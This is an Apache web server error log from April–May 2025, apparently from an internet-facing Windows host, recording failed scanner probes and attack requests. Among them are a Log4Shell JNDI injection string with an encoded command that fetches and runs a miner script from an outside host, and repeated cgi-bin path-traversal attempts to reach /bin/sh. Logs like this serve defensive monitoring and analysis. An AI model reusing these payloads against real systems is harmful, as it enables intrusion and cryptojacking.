[Tue Apr 29 23:19:49.484524 2025] [cgi:error] [pid 5228:tid 1128] [client 66.132.153.56:45642] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Wed Apr 30 01:47:31.154828 2025] [cgi:error] [pid 5228:tid 1128] [client 5.183.209.244:42848] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Wed Apr 30 05:33:22.178089 2025] [cgi:error] [pid 5228:tid 1128] [client 5.183.209.244:55470] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Wed Apr 30 07:56:57.406246 2025] [mpm_winnt:notice] [pid 3488:tid 700] AH00422: Parent: Received shutdown signal -- Shutting down the server.
[Wed Apr 30 07:56:59.437099 2025] [mpm_winnt:notice] [pid 5228:tid 616] AH00364: Child: All worker threads have exited.
[Wed Apr 30 07:57:07.513236 2025] [mpm_winnt:notice] [pid 3488:tid 700] AH00430: Parent: Child process 5228 exited successfully.
[Wed Apr 30 07:57:57.341135 2025] [mpm_winnt:notice] [pid 3476:tid 592] AH00455: Apache/2.4.46 (Win64) configured -- resuming normal operations
[Wed Apr 30 07:57:57.372053 2025] [mpm_winnt:notice] [pid 3476:tid 592] AH00456: Apache Lounge VS16 Server built: Dec 9 2020 13:42:35
[Wed Apr 30 07:57:57.372053 2025] [core:notice] [pid 3476:tid 592] AH00094: Command line: 'C:\\Apache24\\bin\\httpd.exe -d C:/Apache24'
[Wed Apr 30 07:57:57.373051 2025] [mpm_winnt:notice] [pid 3476:tid 592] AH00418: Parent: Created child process 5660
[Wed Apr 30 07:57:57.928565 2025] [mpm_winnt:notice] [pid 5660:tid 832] AH00354: Child: Starting 64 worker threads.
[Wed Apr 30 08:45:15.276835 2025] [cgi:error] [pid 5660:tid 1128] [client 5.183.209.244:36730] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Wed Apr 30 08:51:22.652315 2025] [cgi:error] [pid 5660:tid 1128] [client 141.98.11.128:56826] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Wed Apr 30 09:09:11.310391 2025] [cgi:error] [pid 5660:tid 1132] [client 5.183.209.244:43532] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Wed Apr 30 10:14:20.648630 2025] [core:error] [pid 5660:tid 1140] (20024)The given path is misformatted or contained invalid characters: [client 185.91.127.9:39274] AH00127: Cannot map GET /t%28%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//109.236.80.84:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vNDUuMTU2LjIzLjEwNy9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtczsgd2dldCAtcU8tIGh0dHA6Ly80NS4xNTYuMjMuMTA3L3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1z%7D%27%29 HTTP/1.1 to file, referer: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//109.236.80.84:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vNDUuMTU2LjIzLjEwNy9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtczsgd2dldCAtcU8tIGh0dHA6Ly80NS4xNTYuMjMuMTA3L3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1z}')
[Wed Apr 30 11:43:04.613121 2025] [cgi:error] [pid 5660:tid 1136] [client 183.207.48.227:9944] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Wed Apr 30 12:53:54.212617 2025] [cgi:error] [pid 5660:tid 1112] [client 152.32.142.138:48206] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Wed Apr 30 14:04:54.257908 2025] [core:error] [pid 5660:tid 1096] [client 196.241.66.194:35592] AH00126: Invalid URI in request 'bin/sh' 'POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1'
[Wed Apr 30 16:00:29.305582 2025] [core:error] [pid 5660:tid 1092] [client 223.130.11.165:55040] AH00126: Invalid URI in request 'bin/sh' 'POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1'
[Wed Apr 30 19:22:56.751607 2025] [cgi:error] [pid 5660:tid 1092] [client 45.95.147.209:50364] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Thu May 01 04:59:16.472086 2025] [core:error] [pid 5660:tid 1092] [client 194.126.202.234:25914] AH00126: Invalid URI in request 'bin/sh' 'POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1'
[Thu May 01 05:06:13.737447 2025] [cgi:error] [pid 5660:tid 1092] [client 5.183.209.244:49514] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Thu May 01 11:53:59.651086 2025] [cgi:error] [pid 5660:tid 1092] [client 206.168.34.220:37176] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Thu May 01 15:41:37.050272 2025] [cgi:error] [pid 5660:tid 1096] [client 66.132.153.58:34738] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Thu May 01 19:11:46.481678 2025] [cgi:error] [pid 5660:tid 1092] [client 134.122.94.209:63060] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/authLogin.cgi
[Thu May 01 20:19:20.318463 2025] [cgi:error] [pid 5660:tid 1136] [client 45.95.147.209:57808] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Fri May 02 03:02:25.771494 2025] [cgi:error] [pid 5660:tid 1100] [client 206.168.34.35:38120] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Fri May 02 14:55:48.145804 2025] [cgi:error] [pid 5660:tid 1136] [client 66.132.153.63:33066] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Fri May 02 17:24:58.808913 2025] [cgi:error] [pid 5660:tid 1100] [client 167.94.146.60:38696] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Fri May 02 19:27:55.133317 2025] [core:error] [pid 5660:tid 1136] [client 39.109.117.26:43990] AH00126: Invalid URI in request 'bin/sh' 'POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1'
[Fri May 02 20:34:01.924087 2025] [core:error] [pid 5660:tid 1100] [client 175.4.55.185:38804] AH00126: Invalid URI in request 'bin/sh' 'POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1'
[Fri May 02 20:49:48.436824 2025] [core:error] [pid 5660:tid 1100] [client 147.45.193.59:51394] AH00126: Invalid URI in request 'bin/sh' 'POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1'
[Fri May 02 22:12:08.258472 2025] [cgi:error] [pid 5660:tid 1100] [client 206.168.34.32:52644] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Fri May 02 23:12:47.689446 2025] [cgi:error] [pid 5660:tid 1100] [client 167.94.146.49:38454] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Fri May 02 23:33:17.548123 2025] [cgi:error] [pid 5660:tid 1100] [client 43.153.71.12:38314] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Sat May 03 05:10:38.972092 2025] [cgi:error] [pid 5660:tid 1136] [client 5.183.209.244:35092] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Sat May 03 05:32:07.005736 2025] [core:error] [pid 5660:tid 1136] (20024)The given path is misformatted or contained invalid characters: [client 49.51.52.250:59926] AH00127: Cannot map GET /error/%3C%21-- HTTP/1.1 to file
[Sat May 03 05:58:09.342848 2025] [cgi:error] [pid 5660:tid 1100] [client 52.16.60.102:42506] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Sat May 03 07:46:08.840634 2025] [cgi:error] [pid 5660:tid 1096] [client 45.95.147.209:39120] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Sat May 03 10:11:27.595426 2025] [core:error] [pid 5660:tid 1096] [client 130.162.223.189:52118] AH00126: Invalid URI in request 'bin/sh' 'POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1'
[Sat May 03 13:21:33.400613 2025] [cgi:error] [pid 5660:tid 1136] [client 45.95.147.209:53474] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Sat May 03 16:24:02.365931 2025] [cgi:error] [pid 5660:tid 1100] [client 162.142.125.195:50350] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Sat May 03 16:53:55.647569 2025] [cgi:error] [pid 5660:tid 1100] [client 45.95.147.209:40698] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Sat May 03 20:22:21.154266 2025] [cgi:error] [pid 5660:tid 1100] [client 5.183.209.244:39576] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Sun May 04 02:31:40.357460 2025] [cgi:error] [pid 5660:tid 1100] [client 45.95.147.209:52366] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Sun May 04 04:45:45.522775 2025] [cgi:error] [pid 5660:tid 1100] [client 5.183.209.244:37698] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Sun May 04 05:56:58.009777 2025] [cgi:error] [pid 5660:tid 1100] [client 5.183.209.244:33916] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Sun May 04 06:13:44.625366 2025] [core:error] [pid 5660:tid 1100] [client 8.208.10.66:52288] AH00126: Invalid URI in request 'bin/sh' 'POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1'
[Sun May 04 07:15:50.345001 2025] [cgi:error] [pid 5660:tid 1136] [client 66.132.153.58:39792] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Sun May 04 08:26:39.179400 2025] [cgi:error] [pid 5660:tid 1100] [client 5.183.209.244:35706] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Sun May 04 09:13:15.345877 2025] [cgi:error] [pid 5660:tid 1100] [client 45.95.147.209:44044] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Sun May 04 11:55:05.187953 2025] [core:error] [pid 5660:tid 1100] [client 139.9.246.38:57920] AH00126: Invalid URI in request 'bin/sh' 'POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1'
[Sun May 04 17:47:26.011877 2025] [cgi:error] [pid 5660:tid 1100] [client 5.183.209.244:47800] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Sun May 04 18:35:29.963259 2025] [cgi:error] [pid 5660:tid 1100] [client 5.183.209.244:44266] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Sun May 04 21:07:03.582779 2025] [cgi:error] [pid 5660:tid 1100] [client 5.183.209.244:43334] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Sun May 04 22:17:07.861786 2025] [cgi:error] [pid 5660:tid 1100] [client 5.183.209.244:42232] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Sun May 04 22:26:34.519316 2025] [cgi:error] [pid 5660:tid 1100] [client 45.95.147.209:53812] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Mon May 05 00:23:16.391988 2025] [cgi:error] [pid 5660:tid 1100] [client 5.183.209.244:36472] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Mon May 05 02:47:19.969711 2025] [cgi:error] [pid 5660:tid 1100] [client 5.183.209.244:60794] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Mon May 05 04:36:24.612123 2025] [cgi:error] [pid 5660:tid 1100] [client 154.81.156.54:33490] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Mon May 05 04:37:28.907661 2025] [cgi:error] [pid 5660:tid 1100] [client 66.132.153.60:52880] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Mon May 05 05:31:10.438021 2025] [cgi:error] [pid 5660:tid 1100] [client 5.183.209.244:48178] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Mon May 05 06:48:14.587198 2025] [cgi:error] [pid 5660:tid 1100] [client 45.95.147.209:34000] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Mon May 05 07:28:31.995946 2025] [cgi:error] [pid 5660:tid 1100] [client 141.98.11.137:49234] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Mon May 05 08:15:22.190165 2025] [mpm_winnt:notice] [pid 3476:tid 592] AH00422: Parent: Received shutdown signal -- Shutting down the server.
[Mon May 05 08:15:24.221037 2025] [mpm_winnt:notice] [pid 5660:tid 832] AH00364: Child: All worker threads have exited.
[Mon May 05 08:16:15.040110 2025] [core:warn] [pid 3432:tid 668] AH00098: pid file C:/Apache24/logs/httpd.pid overwritten -- Unclean shutdown of previous Apache run?
[Mon May 05 08:16:15.079006 2025] [mpm_winnt:notice] [pid 3432:tid 668] AH00455: Apache/2.4.46 (Win64) configured -- resuming normal operations
[Mon May 05 08:16:15.079006 2025] [mpm_winnt:notice] [pid 3432:tid 668] AH00456: Apache Lounge VS16 Server built: Dec 9 2020 13:42:35
[Mon May 05 08:16:15.079006 2025] [core:notice] [pid 3432:tid 668] AH00094: Command line: 'C:\\Apache24\\bin\\httpd.exe -d C:/Apache24'
[Mon May 05 08:16:15.080003 2025] [mpm_winnt:notice] [pid 3432:tid 668] AH00418: Parent: Created child process 4948
[Mon May 05 08:16:15.768568 2025] [mpm_winnt:notice] [pid 4948:tid 744] AH00354: Child: Starting 64 worker threads.
[Mon May 05 08:34:06.835026 2025] [cgi:error] [pid 4948:tid 1120] [client 71.6.135.131:38498] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Mon May 05 08:53:34.807212 2025] [mpm_winnt:notice] [pid 3432:tid 668] AH00422: Parent: Received shutdown signal -- Shutting down the server.
[Mon May 05 08:53:36.838091 2025] [mpm_winnt:notice] [pid 4948:tid 744] AH00364: Child: All worker threads have exited.
[Mon May 05 08:54:43.443803 2025] [core:warn] [pid 3376:tid 596] AH00098: pid file C:/Apache24/logs/httpd.pid overwritten -- Unclean shutdown of previous Apache run?
[Mon May 05 08:54:43.475044 2025] [mpm_winnt:notice] [pid 3376:tid 596] AH00455: Apache/2.4.46 (Win64) configured -- resuming normal operations
[Mon May 05 08:54:43.475044 2025] [mpm_winnt:notice] [pid 3376:tid 596] AH00456: Apache Lounge VS16 Server built: Dec 9 2020 13:42:35
[Mon May 05 08:54:43.475044 2025] [core:notice] [pid 3376:tid 596] AH00094: Command line: 'C:\\Apache24\\bin\\httpd.exe -d C:/Apache24'
[Mon May 05 08:54:43.475044 2025] [mpm_winnt:notice] [pid 3376:tid 596] AH00418: Parent: Created child process 4876
[Mon May 05 08:54:44.035065 2025] [mpm_winnt:notice] [pid 4876:tid 600] AH00354: Child: Starting 64 worker threads.
[Mon May 05 12:21:44.355621 2025] [cgi:error] [pid 4876:tid 1140] [client 154.81.156.54:33810] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Mon May 05 12:59:15.172898 2025] [cgi:error] [pid 4876:tid 1128] [client 34.22.146.211:47568] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Mon May 05 17:03:28.049870 2025] [cgi:error] [pid 4876:tid 1140] [client 154.81.156.54:41970] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Mon May 05 19:22:49.759685 2025] [cgi:error] [pid 4876:tid 1140] [client 154.81.156.54:53824] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Tue May 06 02:09:01.442454 2025] [core:error] [pid 4876:tid 1132] [client 47.236.50.100:55232] AH00126: Invalid URI in request 'bin/sh' 'POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1'
[Tue May 06 06:09:59.172684 2025] [cgi:error] [pid 4876:tid 1140] [client 45.95.147.209:47912] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Tue May 06 13:24:52.375830 2025] [core:error] [pid 4876:tid 1124] [client 175.4.55.185:38006] AH00126: Invalid URI in request 'bin/sh' 'POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1'
[Tue May 06 18:23:05.258873 2025] [cgi:error] [pid 4876:tid 1136] [client 167.94.145.100:58614] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Tue May 06 19:21:13.869073 2025] [cgi:error] [pid 4876:tid 1136] [client 167.94.146.50:34664] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Tue May 06 20:04:10.138451 2025] [cgi:error] [pid 4876:tid 1136] [client 45.95.147.209:50970] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Tue May 06 20:16:20.930354 2025] [cgi:error] [pid 4876:tid 1136] [client 66.132.153.57:49108] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Wed May 07 00:18:20.398243 2025] [cgi:error] [pid 4876:tid 1120] [client 2.59.22.234:33010] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Wed May 07 04:40:59.845915 2025] [cgi:error] [pid 4876:tid 1132] [client 141.98.11.27:49290] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Wed May 07 04:58:41.597546 2025] [cgi:error] [pid 4876:tid 1140] [client 64.226.120.229:57196] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/authLogin.cgi
[Wed May 07 06:13:53.058006 2025] [cgi:error] [pid 4876:tid 1136] [client 138.68.70.18:42488] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/authLogin.cgi
[Wed May 07 06:51:43.048257 2025] [cgi:error] [pid 4876:tid 1120] [client 141.98.11.27:35084] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Wed May 07 10:52:24.867229 2025] [mpm_winnt:notice] [pid 3376:tid 596] AH00422: Parent: Received shutdown signal -- Shutting down the server.
[Wed May 07 10:52:26.898102 2025] [mpm_winnt:notice] [pid 4876:tid 600] AH00364: Child: All worker threads have exited.
[Wed May 07 10:53:29.615185 2025] [core:warn] [pid 3272:tid 620] AH00098: pid file C:/Apache24/logs/httpd.pid overwritten -- Unclean shutdown of previous Apache run?
[Wed May 07 10:53:29.642113 2025] [mpm_winnt:notice] [pid 3272:tid 620] AH00455: Apache/2.4.46 (Win64) configured -- resuming normal operations
[Wed May 07 10:53:29.642113 2025] [mpm_winnt:notice] [pid 3272:tid 620] AH00456: Apache Lounge VS16 Server built: Dec 9 2020 13:42:35
[Wed May 07 10:53:29.642113 2025] [core:notice] [pid 3272:tid 620] AH00094: Command line: 'C:\\Apache24\\bin\\httpd.exe -d C:/Apache24'
[Wed May 07 10:53:29.643110 2025] [mpm_winnt:notice] [pid 3272:tid 620] AH00418: Parent: Created child process 4776
[Wed May 07 10:53:30.446961 2025] [mpm_winnt:notice] [pid 4776:tid 852] AH00354: Child: Starting 64 worker threads.
[Wed May 07 15:16:58.726676 2025] [cgi:error] [pid 4776:tid 1140] [client 66.132.153.54:36364] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Wed May 07 21:30:52.708732 2025] [core:error] [pid 4776:tid 1140] [client 103.234.53.78:42580] AH00126: Invalid URI in request 'bin/sh' 'POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1'
[Thu May 08 02:33:18.824255 2025] [cgi:error] [pid 4776:tid 1140] [client 43.153.10.83:56350] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Thu May 08 05:48:32.985712 2025] [cgi:error] [pid 4776:tid 1120] [client 123.58.209.112:48766] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Thu May 08 08:15:12.341084 2025] [core:error] [pid 4776:tid 1140] [client 34.34.185.61:39574] AH00126: Invalid URI in request 'bin/sh' 'POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1'
[Thu May 08 19:17:10.104556 2025] [cgi:error] [pid 4776:tid 1100] [client 206.168.34.40:47808] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Fri May 09 06:08:04.301400 2025] [cgi:error] [pid 4776:tid 1140] [client 141.98.11.27:32948] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Fri May 09 09:35:21.602197 2025] [cgi:error] [pid 4776:tid 1100] [client 141.98.11.27:38092] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Fri May 09 11:27:46.694810 2025] [cgi:error] [pid 4776:tid 1140] [client 141.98.11.27:50194] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Fri May 09 22:22:48.879409 2025] [cgi:error] [pid 4776:tid 1140] [client 141.98.11.27:51136] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Sat May 10 03:04:48.733558 2025] [cgi:error] [pid 4776:tid 1100] [client 66.132.153.55:36228] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Sat May 10 04:00:04.991781 2025] [cgi:error] [pid 4776:tid 1100] [client 199.45.154.131:45354] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Sat May 10 06:03:27.965770 2025] [cgi:error] [pid 4776:tid 1140] [client 3.248.77.100:37404] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Sat May 10 09:07:01.528928 2025] [cgi:error] [pid 4776:tid 1140] [client 45.95.147.209:32864] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Sat May 10 13:20:07.399234 2025] [cgi:error] [pid 4776:tid 1100] [client 141.98.11.27:34758] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Sat May 10 14:56:21.899408 2025] [cgi:error] [pid 4776:tid 1100] [client 141.98.11.27:44942] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Sat May 10 16:49:11.090106 2025] [cgi:error] [pid 4776:tid 1140] [client 141.98.11.27:39952] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Sat May 10 20:22:51.691076 2025] [cgi:error] [pid 4776:tid 1140] [client 66.132.153.62:51742] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Sat May 10 20:48:48.506749 2025] [cgi:error] [pid 4776:tid 1140] [client 45.95.147.209:45398] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Sat May 10 21:49:09.357305 2025] [cgi:error] [pid 4776:tid 1140] [client 141.98.11.27:52278] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Sat May 10 22:45:07.400247 2025] [core:error] [pid 4776:tid 1140] [client 216.10.250.218:34950] AH00126: Invalid URI in request 'bin/sh' 'POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1'
[Sat May 10 23:37:13.832291 2025] [cgi:error] [pid 4776:tid 1140] [client 141.98.11.27:38674] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Sun May 11 10:46:58.080834 2025] [core:error] [pid 4776:tid 1100] [client 69.4.82.134:54424] AH00126: Invalid URI in request 'bin/sh' 'POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1'
[Sun May 11 15:13:23.583186 2025] [cgi:error] [pid 4776:tid 1140] [client 206.168.34.79:43936] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Mon May 12 02:53:12.945552 2025] [core:error] [pid 4776:tid 1128] [client 92.55.190.215:55140] AH00126: Invalid URI in request 'bin/sh' 'POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1'
[Mon May 12 03:02:35.506350 2025] [cgi:error] [pid 4776:tid 1096] [client 143.42.63.237:58684] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/info.cgi
[Mon May 12 03:02:40.769873 2025] [cgi:error] [pid 4776:tid 1096] [client 143.42.63.237:59026] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/param.cgi
[Mon May 12 05:10:54.262501 2025] [cgi:error] [pid 4776:tid 1096] [client 66.132.153.56:34390] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Mon May 12 06:15:27.087957 2025] [cgi:error] [pid 4776:tid 1096] [client 167.94.146.62:49002] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Mon May 12 06:59:17.856445 2025] [cgi:error] [pid 4776:tid 1096] [client 139.59.138.148:9130] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/authLogin.cgi
[Mon May 12 11:39:16.313385 2025] [core:error] [pid 4776:tid 1092] [client 219.132.37.52:43142] AH00126: Invalid URI in request 'bin/sh' 'POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1'
[Mon May 12 16:02:05.396244 2025] [cgi:error] [pid 4776:tid 1120] [client 141.98.11.27:45954] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Mon May 12 17:18:04.640289 2025] [cgi:error] [pid 4776:tid 1128] [client 199.45.154.133:47296] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Mon May 12 19:19:25.079846 2025] [cgi:error] [pid 4776:tid 1128] [client 141.98.11.27:55090] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Mon May 12 20:24:03.712858 2025] [core:error] [pid 4776:tid 1128] [client 185.91.69.110:37834] AH00126: Invalid URI in request 'stager64' 'GET stager64 HTTP/1.1'
[Mon May 12 20:56:07.751327 2025] [cgi:error] [pid 4776:tid 1128] [client 141.98.11.27:39772] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Tue May 13 00:25:42.949167 2025] [cgi:error] [pid 4776:tid 1128] [client 141.98.11.27:36238] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Tue May 13 00:26:12.929792 2025] [cgi:error] [pid 4776:tid 1128] [client 66.132.153.63:44670] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Tue May 13 03:40:47.115786 2025] [cgi:error] [pid 4776:tid 1128] [client 170.106.197.109:41078] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Tue May 13 05:05:29.407973 2025] [cgi:error] [pid 4776:tid 1120] [client 141.98.11.27:60088] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Tue May 13 05:20:03.361493 2025] [cgi:error] [pid 4776:tid 1120] [client 167.94.146.49:39534] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Tue May 13 13:08:36.048871 2025] [cgi:error] [pid 4776:tid 1120] [client 80.66.75.121:54250] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/main-cgi
[Tue May 13 16:48:00.470042 2025] [cgi:error] [pid 4776:tid 1140] [client 167.94.138.205:59470] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Tue May 13 20:26:35.619830 2025] [core:error] [pid 4776:tid 1088] [client 185.213.175.171:36142] AH00126: Invalid URI in request 'stager64' 'GET stager64 HTTP/1.1'
[Wed May 14 08:41:47.085649 2025] [cgi:error] [pid 4776:tid 1124] [client 141.98.11.27:50908] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
